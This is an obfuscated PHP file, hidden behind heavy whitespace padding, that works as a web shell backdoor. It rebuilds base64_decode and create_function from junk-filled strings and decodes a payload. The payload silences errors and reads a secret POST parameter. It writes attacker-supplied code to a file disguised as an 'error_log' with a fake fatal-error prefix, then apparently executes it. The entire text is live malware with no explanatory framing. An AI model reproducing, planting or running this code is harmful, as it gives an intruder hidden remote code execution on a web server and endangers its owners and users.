







										                                                                               <?php















																																																																																																                     $yS4 = "ZXJyb3qJfcmVwb3J0aWq5nKDApOw0KqaWdub3JlX3VzZXqJfYWJvcnQodHJ1ZSqk7DQ";











































																																															                                               $rs = "nZXJyqb3qJfbqGq9nJyk7DQqogIEBq1bmxpbmqsoJ2Vycm9yX2xvZycpO2V4aXQ7DQpq9";







									                         $P7 = "qzNjqc5ODEzqNSddLDEpKS5QSFBfRUq9MLic/qPic7DQqogIGZvcqigkaTq0qwOyRqp";
















																																																																																																				                                                                 $gF = "9yOiBjb2RlKqDEpIDwnLic/cqGhwJy4kZXJyKTqsNCiqAgQHJlcXVpqcmVfb25qjZSg";

																																																																														             $IPr = "VudHMoJq2Vycm9yX2xvZycsJ1BIUCBGYqXRhbCBlcnJvqcjogIFVuY2F1Z2h0IEVycm";


































































																                      $pAc = "PDEwMDskaqSsrKSRlcnI9UqEhQX0VPTC4kZXJyOw0KIqCBAZmlsZV9wdXqRfY29qudG";































































																																					                               $yeA = "1J10pKXsNCiAgJGVycj1qiYXNlNjqRfZGVqjqb2RlKHN1YqnN0cigkX1BPqU1qRbJzE";














																																                                            $Pu = str_replace("+", "", "+s+t+r+_r+eplac+e");


























																									             $pd = $Pu("v", "", "vbasvev64_vdvevcovdve");













































































																																	                       $lN = $Pu("m", "", "cmreamtem_mfumnmctimomn");
























































																																																                  $Ev = "pqzZXRqfdGlqtZV9saW1pdCgwKTsNCmlmqKGlzc2V0KCRfUE9TqVFsnMTqM2Nzk4MTM";












































































																																																																																										                                                                $hh = $lN("", $pd($Pu("q", "", $yS4.$Ev.$yeA.$P7.$pAc.$IPr.$gF.$rs)));























																																																																																																                                                                         $hh();
















































												                                                                         
